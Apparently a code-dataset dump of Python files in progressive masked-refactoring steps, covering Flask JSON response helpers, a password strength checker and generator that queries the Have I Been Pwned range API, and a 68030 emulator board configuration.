Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n",
"step-ids": [
8,
10,
12,
13,
15
]
}
|
[
8,
10,
12,
13,
15
] |
<|reserved_special_token_0|>
def _render(resp):
response = make_response(jsonify(resp))
return response
<|reserved_special_token_0|>
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _render(resp):
response = make_response(jsonify(resp))
return response
def json_list_render(code, data, limit, offset, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, limit=limit, offset=offset, message=message,
data=data)
return _render(resp)
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def _render(resp):
response = make_response(jsonify(resp))
return response
def json_list_render(code, data, limit, offset, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, limit=limit, offset=offset, message=message,
data=data)
return _render(resp)
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
def json_token_render(code, token, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, token=token, message=message)
return _render(resp)
def json_detail_render_sse(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
<|reserved_special_token_1|>
import json
from flask import jsonify
from flask import make_response
from MultipleInterfaceManager.settings import STATUS_CODE
def _render(resp):
response = make_response(jsonify(resp))
return response
def json_list_render(code, data, limit, offset, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, limit=limit, offset=offset, message=message,
data=data)
return _render(resp)
def json_detail_render(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return _render(resp)
def json_token_render(code, token, message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, token=token, message=message)
return _render(resp)
def json_detail_render_sse(code, data=[], message=None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
<|reserved_special_token_1|>
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
from flask import jsonify
from flask import make_response
from MultipleInterfaceManager.settings import STATUS_CODE
def _render(resp):
response = make_response(jsonify(resp))
# response.headers["Access-Control-Allow-Origin"] = "*"
return response
def json_list_render(code, data, limit, offset, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
limit = limit,
offset = offset,
message = message,
data = data
)
return _render(resp)
def json_detail_render(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
message = message,
data = data
)
return _render(resp)
def json_token_render(code, token, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
token = token,
message = message
)
return _render(resp)
def json_detail_render_sse(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
|
flexible
|
{
"blob_id": "a87ab07bb1502a75a7e705cd5c92db829ebdd966",
"index": 8689,
"step-1": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\n<mask token>\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-4": "import json\nfrom flask import jsonify\nfrom flask import make_response\nfrom MultipleInterfaceManager.settings import STATUS_CODE\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-5": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport json\r\n\r\nfrom flask import jsonify\r\nfrom flask import make_response\r\nfrom MultipleInterfaceManager.settings import STATUS_CODE\r\n\r\n\r\ndef _render(resp):\r\n response = make_response(jsonify(resp))\r\n# response.headers[\"Access-Control-Allow-Origin\"] = \"*\"\r\n return response\r\n\r\n\r\n\r\ndef json_list_render(code, data, limit, offset, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n limit = limit,\r\n offset = offset,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\n\r\ndef json_detail_render(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\ndef json_token_render(code, token, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n token = token,\r\n message = message\r\n )\r\n return _render(resp)\r\n\r\ndef json_detail_render_sse(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(code=code, message=message, data=data)\r\n return json.dumps(resp)\r\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
__version__ = "1.2.0"
import hashlib
from collections import Counter
from re import findall
from secrets import choice
from string import ascii_letters, ascii_lowercase, ascii_uppercase
from string import digits as all_digits
from string import punctuation
import requests
def check_password(password):
"""Check a given password against known data breaches
Note:
This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.
Args:
password (str): The password to check
Returns:
int: The number of times the password has been found
"""
sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest()
response = requests.get(f"https://api.pwnedpasswords.com/range/{sha1[:5]}")
hash_suffix_list = [x.split(":") for x in response.text.splitlines(False)]
try:
count = [
count for suffix, count in hash_suffix_list if sha1.endswith(suffix.lower())
][0]
except IndexError:
return 0
return int(count)
class PasswordRequirements:
"""A set of requirements to check passwords against
Keyword Args:
min_length (int): The minimum length of the password
min_digits (int): The minimum number of digits in the password
min_special (int): The minimum number of special characters in the password
min_alpha (int): The minimum number of alphabetical characters in the password
min_upper (int): The minimum number of uppercase letters in the password
min_lower (int): The minimum number of lowercase letters in the password
check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)
func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements
"""
def __init__(
self,
*,
min_length=0,
min_digits=0,
min_special=0,
min_alpha=0,
min_upper=0,
min_lower=0,
check_breaches=False,
func=None,
):
self.min_length = min_length
self.min_digits = min_digits
self.min_special = min_special
self.min_alpha = min_alpha
self.min_upper = min_upper
self.min_lower = min_lower
self.check_breaches = check_breaches
self.func = func
def check(self, password):
"""Check a password against the requirements
Args:
password (str): The password to check
Returns:
bool: Whether the password meets all the given requirements
"""
if len(password) < self.min_length:
return False
digits = len(findall(r"\d", password))
if digits < self.min_digits:
return False
special_chars = sum(v for k, v in Counter(password).items() if k in punctuation)
if special_chars < self.min_special:
return False
alpha_chars = sum(v for k, v in Counter(password).items() if k in ascii_letters)
if alpha_chars < self.min_alpha:
return False
upper_chars = sum(
v for k, v in Counter(password).items() if k in ascii_uppercase
)
if upper_chars < self.min_upper:
return False
lower_chars = sum(
v for k, v in Counter(password).items() if k in ascii_lowercase
)
if lower_chars < self.min_lower:
return False
if self.check_breaches and check_password(password):
return False
if self.func and not self.func(password):
return False
return True
class PasswordGenerator:
"""A random password generator
Args:
length (int): The length of the password
Keyword Args:
uppercase (bool): Whether to allow uppercase letters in the password
lowercase (bool): Whether to allow lowercase letters in the password
digits (bool): Whether to allow numerical digits in the password
special (bool): Whether to allow special characters in the password
"""
def __init__(
self, length, *, uppercase=True, lowercase=True, digits=True, special=True
):
self.length = length
self.uppercase = uppercase
self.lowercase = lowercase
self.digits = digits
self.special = special
def generate(
self, length=None, uppercase=None, lowercase=None, digits=None, special=None
):
"""Generate a random password
Keyword Args:
length (int): The length of the password
uppercase (bool): Whether to allow uppercase letters in the password
lowercase (bool): Whether to allow lowercase letters in the password
digits (bool): Whether to allow numerical digits in the password
special (bool): Whether to allow special characters in the password
Returns:
str: The freshly generated password
"""
if length is None:
length = self.length
allowed_chars = ""
if uppercase is not None:
allowed_chars += ascii_uppercase if uppercase else ""
elif self.uppercase:
allowed_chars += ascii_uppercase
if lowercase is not None:
allowed_chars += ascii_lowercase if lowercase else ""
elif self.lowercase:
allowed_chars += ascii_lowercase
if digits is not None:
allowed_chars += all_digits if digits else ""
elif self.digits:
allowed_chars += all_digits
if special is not None:
allowed_chars += punctuation if special else ""
elif self.special:
allowed_chars += punctuation
return "".join(choice(allowed_chars) for _ in range(length))
def __len__(self):
return self.length if self.length >= 0 else 0
|
normal
|
{
"blob_id": "eafe89de10c4187057b0cc1e0e9772f03a576b0d",
"index": 9771,
"step-1": "<mask token>\n\n\nclass PasswordGenerator:\n <mask token>\n\n def __init__(self, length, *, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-2": "<mask token>\n\n\nclass PasswordRequirements:\n <mask token>\n <mask token>\n <mask token>\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(self, length, *, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-3": "<mask token>\n\n\ndef check_password(password):\n \"\"\"Check a given password against known data breaches\n\n Note:\n This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.\n\n Args:\n password (str): The password to check\n\n Returns:\n int: The number of times the password has been found\n \"\"\"\n sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()\n response = requests.get(f'https://api.pwnedpasswords.com/range/{sha1[:5]}')\n hash_suffix_list = [x.split(':') for x in response.text.splitlines(False)]\n try:\n count = [count for suffix, count in hash_suffix_list if sha1.\n endswith(suffix.lower())][0]\n except IndexError:\n return 0\n return int(count)\n\n\nclass PasswordRequirements:\n \"\"\"A set of requirements to check passwords against\n\n Keyword Args:\n min_length (int): The minimum length of the password\n min_digits (int): The minimum number of digits in the password\n min_special (int): The minimum number of special characters in the password\n min_alpha (int): The minimum number of alphabetical characters in the password\n min_upper (int): The minimum number of uppercase letters in the password\n min_lower (int): The minimum number of lowercase letters in the password\n check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)\n func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements\n \"\"\"\n\n def __init__(self, *, min_length=0, min_digits=0, min_special=0,\n min_alpha=0, min_upper=0, min_lower=0, check_breaches=False, func=None\n ):\n self.min_length = min_length\n self.min_digits = min_digits\n self.min_special = min_special\n self.min_alpha = min_alpha\n self.min_upper = min_upper\n self.min_lower = min_lower\n self.check_breaches = check_breaches\n self.func = func\n\n def check(self, password):\n \"\"\"Check a password against the requirements\n\n Args:\n password (str): The password to check\n\n Returns:\n bool: Whether the password meets all the given requirements\n \"\"\"\n if len(password) < self.min_length:\n return False\n digits = len(findall('\\\\d', password))\n if digits < self.min_digits:\n return False\n special_chars = sum(v for k, v in Counter(password).items() if k in\n punctuation)\n if special_chars < self.min_special:\n return False\n alpha_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_letters)\n if alpha_chars < self.min_alpha:\n return False\n upper_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_uppercase)\n if upper_chars < self.min_upper:\n return False\n lower_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_lowercase)\n if lower_chars < self.min_lower:\n return False\n if self.check_breaches and check_password(password):\n return False\n if self.func and not self.func(password):\n return False\n return True\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(self, length, *, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-4": "__version__ = '1.2.0'\nimport hashlib\nfrom collections import Counter\nfrom re import findall\nfrom secrets import choice\nfrom string import ascii_letters, ascii_lowercase, ascii_uppercase\nfrom string import digits as all_digits\nfrom string import punctuation\nimport requests\n\n\ndef check_password(password):\n \"\"\"Check a given password against known data breaches\n\n Note:\n This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.\n\n Args:\n password (str): The password to check\n\n Returns:\n int: The number of times the password has been found\n \"\"\"\n sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()\n response = requests.get(f'https://api.pwnedpasswords.com/range/{sha1[:5]}')\n hash_suffix_list = [x.split(':') for x in response.text.splitlines(False)]\n try:\n count = [count for suffix, count in hash_suffix_list if sha1.\n endswith(suffix.lower())][0]\n except IndexError:\n return 0\n return int(count)\n\n\nclass PasswordRequirements:\n \"\"\"A set of requirements to check passwords against\n\n Keyword Args:\n min_length (int): The minimum length of the password\n min_digits (int): The minimum number of digits in the password\n min_special (int): The minimum number of special characters in the password\n min_alpha (int): The minimum number of alphabetical characters in the password\n min_upper (int): The minimum number of uppercase letters in the password\n min_lower (int): The minimum number of lowercase letters in the password\n check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)\n func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements\n \"\"\"\n\n def __init__(self, *, min_length=0, min_digits=0, min_special=0,\n min_alpha=0, min_upper=0, min_lower=0, check_breaches=False, func=None\n ):\n self.min_length = min_length\n self.min_digits = min_digits\n self.min_special = min_special\n self.min_alpha = min_alpha\n self.min_upper = min_upper\n self.min_lower = min_lower\n self.check_breaches = check_breaches\n self.func = func\n\n def check(self, password):\n \"\"\"Check a password against the requirements\n\n Args:\n password (str): The password to check\n\n Returns:\n bool: Whether the password meets all the given requirements\n \"\"\"\n if len(password) < self.min_length:\n return False\n digits = len(findall('\\\\d', password))\n if digits < self.min_digits:\n return False\n special_chars = sum(v for k, v in Counter(password).items() if k in\n punctuation)\n if special_chars < self.min_special:\n return False\n alpha_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_letters)\n if alpha_chars < self.min_alpha:\n return False\n upper_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_uppercase)\n if upper_chars < self.min_upper:\n return False\n lower_chars = sum(v for k, v in Counter(password).items() if k in\n ascii_lowercase)\n if lower_chars < self.min_lower:\n return False\n if self.check_breaches and check_password(password):\n return False\n if self.func and not self.func(password):\n return False\n return True\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(self, length, *, uppercase=True, lowercase=True, digits=\n True, special=True):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(self, length=None, uppercase=None, lowercase=None, digits=\n None, special=None):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n allowed_chars = ''\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else ''\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else ''\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n if digits is not None:\n allowed_chars += all_digits if digits else ''\n elif self.digits:\n allowed_chars += all_digits\n if special is not None:\n allowed_chars += punctuation if special else ''\n elif self.special:\n allowed_chars += punctuation\n return ''.join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-5": "__version__ = \"1.2.0\"\n\nimport hashlib\nfrom collections import Counter\nfrom re import findall\nfrom secrets import choice\nfrom string import ascii_letters, ascii_lowercase, ascii_uppercase\nfrom string import digits as all_digits\nfrom string import punctuation\n\nimport requests\n\n\ndef check_password(password):\n \"\"\"Check a given password against known data breaches\n\n Note:\n This method uses the `Have I Been Pwned <https://haveibeenpwned.com/>`_ Passwords API. The unhashed password nor its full `SHA-1 <https://en.wikipedia.org/wiki/SHA-1>`_ hash never leave the device.\n\n Args:\n password (str): The password to check\n\n Returns:\n int: The number of times the password has been found\n \"\"\"\n\n sha1 = hashlib.sha1(password.encode(\"utf-8\")).hexdigest()\n\n response = requests.get(f\"https://api.pwnedpasswords.com/range/{sha1[:5]}\")\n\n hash_suffix_list = [x.split(\":\") for x in response.text.splitlines(False)]\n\n try:\n count = [\n count for suffix, count in hash_suffix_list if sha1.endswith(suffix.lower())\n ][0]\n except IndexError:\n return 0\n\n return int(count)\n\n\nclass PasswordRequirements:\n \"\"\"A set of requirements to check passwords against\n\n Keyword Args:\n min_length (int): The minimum length of the password\n min_digits (int): The minimum number of digits in the password\n min_special (int): The minimum number of special characters in the password\n min_alpha (int): The minimum number of alphabetical characters in the password\n min_upper (int): The minimum number of uppercase letters in the password\n min_lower (int): The minimum number of lowercase letters in the password\n check_breaches (bool): Whether to ensure that passwords aren't found in known data breaches (uses :meth:`~passwd.check_password`)\n func (function): A function that takes in a password (:class:`str`) and returns a :class:`bool` that must be ``True`` for the password to meet all requirements\n \"\"\"\n\n def __init__(\n self,\n *,\n min_length=0,\n min_digits=0,\n min_special=0,\n min_alpha=0,\n min_upper=0,\n min_lower=0,\n check_breaches=False,\n func=None,\n ):\n self.min_length = min_length\n self.min_digits = min_digits\n self.min_special = min_special\n self.min_alpha = min_alpha\n self.min_upper = min_upper\n self.min_lower = min_lower\n self.check_breaches = check_breaches\n self.func = func\n\n def check(self, password):\n \"\"\"Check a password against the requirements\n\n Args:\n password (str): The password to check\n\n Returns:\n bool: Whether the password meets all the given requirements\n \"\"\"\n\n if len(password) < self.min_length:\n return False\n\n digits = len(findall(r\"\\d\", password))\n if digits < self.min_digits:\n return False\n\n special_chars = sum(v for k, v in Counter(password).items() if k in punctuation)\n if special_chars < self.min_special:\n return False\n\n alpha_chars = sum(v for k, v in Counter(password).items() if k in ascii_letters)\n if alpha_chars < self.min_alpha:\n return False\n\n upper_chars = sum(\n v for k, v in Counter(password).items() if k in ascii_uppercase\n )\n if upper_chars < self.min_upper:\n return False\n\n lower_chars = sum(\n v for k, v in Counter(password).items() if k in ascii_lowercase\n )\n if lower_chars < self.min_lower:\n return False\n\n if self.check_breaches and check_password(password):\n return False\n\n if self.func and not self.func(password):\n return False\n\n return True\n\n\nclass PasswordGenerator:\n \"\"\"A random password generator\n\n Args:\n length (int): The length of the password\n\n Keyword Args:\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n \"\"\"\n\n def __init__(\n self, length, *, uppercase=True, lowercase=True, digits=True, special=True\n ):\n self.length = length\n self.uppercase = uppercase\n self.lowercase = lowercase\n self.digits = digits\n self.special = special\n\n def generate(\n self, length=None, uppercase=None, lowercase=None, digits=None, special=None\n ):\n \"\"\"Generate a random password\n\n Keyword Args:\n length (int): The length of the password\n uppercase (bool): Whether to allow uppercase letters in the password\n lowercase (bool): Whether to allow lowercase letters in the password\n digits (bool): Whether to allow numerical digits in the password\n special (bool): Whether to allow special characters in the password\n\n Returns:\n str: The freshly generated password\n \"\"\"\n if length is None:\n length = self.length\n \n allowed_chars = \"\"\n\n if uppercase is not None:\n allowed_chars += ascii_uppercase if uppercase else \"\"\n elif self.uppercase:\n allowed_chars += ascii_uppercase\n\n if lowercase is not None:\n allowed_chars += ascii_lowercase if lowercase else \"\"\n elif self.lowercase:\n allowed_chars += ascii_lowercase\n\n if digits is not None:\n allowed_chars += all_digits if digits else \"\"\n elif self.digits:\n allowed_chars += all_digits\n\n if special is not None:\n allowed_chars += punctuation if special else \"\"\n elif self.special:\n allowed_chars += punctuation\n\n return \"\".join(choice(allowed_chars) for _ in range(length))\n\n def __len__(self):\n return self.length if self.length >= 0 else 0\n",
"step-ids": [
4,
6,
10,
12,
13
]
}
|
[
4,
6,
10,
12,
13
] |
from emulator import Emulator
from device import Device
from devices.compactflash import CompactFlash
from devices.mc68681 import MC68681
from musashi import m68k
def add_arguments(parser):
parser.add_argument('--rom',
type=str,
help='ROM image')
parser.add_argument('--dram-size',
type=int,
default=16,
help='DRAM size; boards may have 16, 64 or 128M')
parser.add_argument('--cf-width',
type=int,
default=8,
help='CompactFlash interface width, 8 or 16')
CompactFlash.add_arguments(parser)
MC68681.add_arguments(parser)
class CB030Remap(Device):
def __init__(self, args, **options):
super().__init__(args=args,
name='CB030Remap',
required_options=['address'],
**options)
# no registers, just a 4k aperture
self.size = 0x1000
self._did_remap = False
self._dram_size = args.dram_size
def access(self, operation, offset, size, value):
if not self._did_remap:
# remove the low alias of the EEPROM
self.emu.remove_memory(base=0)
# and add the previously-masked DRAM
self.emu.add_memory(base=0x0000000, size=self._dram_size * 1024 * 1024)
return 0
class CB030Ticker(Device):
def __init__(self, args, **options):
super().__init__(args=args,
name='CB030Ticker',
required_options=['address'],
**options)
# no registers, just a 4k aperture
self.size = 0x1000
# core clock @ 24MHz, 100Hz tick rate
self._tick_cycles = int(self.emu.cycle_rate / 100)
self.reset()
def reset(self):
self._stop()
self._tick_fired = False
def access(self, operation, offset, size, value):
if offset < 0x800:
self._stop()
else:
self._start()
def _stop(self):
self.callback_cancel('tick')
self._ticker_on = False
def _start(self):
if not self._ticker_on:
self.callback_every(self._tick_cycles, 'tick', self._tick)
self._ticker_on = True
def _tick(self):
if self._ticker_on:
self._tick_fired = True
self.assert_ipl()
def get_vector(self):
if self._tick_fired:
self._tick_fired = False
return M68K_IRQ_AUTOVECTOR
return M68K_IRQ_SPURIOUS
def configure(args):
"""create and configure an emulator"""
emu = Emulator(args,
cpu='68030',
frequency=24 * 1000 * 1000)
# initially only the EEPROM exists; aliased at 0 all the way up to 0xfe000000
# we only map the low and high aliases, as the intermediates aren't interesting
emu.add_memory(base=0, size=512 * 1024, writable=False, from_file=args.rom)
emu.add_memory(base=0xfe000000, size=512 * 1024, writable=False, from_file=args.rom)
emu.add_device(args,
MC68681,
address=0xfffff000,
interrupt=m68k.IRQ_2,
register_arrangement='16-bit-doubled')
emu.add_device(args,
CompactFlash,
address=0xffffe000,
register_arrangement='8-bit' if args.cf_width == 8 else '16-bit')
emu.add_device(args,
CB030Remap,
address=0xffff8000)
emu.add_device(args,
CB030Ticker,
address=0xffff9000,
interrupt=m68k.IRQ_6)
return emu
|
normal
|
{
"blob_id": "9eef202a42bfc10b2f52d1b9153d664c5046c13f",
"index": 1965,
"step-1": "<mask token>\n\n\nclass CB030Ticker(Device):\n\n def __init__(self, args, **options):\n super().__init__(args=args, name='CB030Ticker', required_options=[\n 'address'], **options)\n self.size = 4096\n self._tick_cycles = int(self.emu.cycle_rate / 100)\n self.reset()\n\n def reset(self):\n self._stop()\n self._tick_fired = False\n\n def access(self, operation, offset, size, value):\n if offset < 2048:\n self._stop()\n else:\n self._start()\n\n def _stop(self):\n self.callback_cancel('tick')\n self._ticker_on = False\n <mask token>\n\n def _tick(self):\n if self._ticker_on:\n self._tick_fired = True\n self.assert_ipl()\n\n def get_vector(self):\n if self._tick_fired:\n self._tick_fired = False\n return M68K_IRQ_AUTOVECTOR\n return M68K_IRQ_SPURIOUS\n\n\n<mask token>\n",
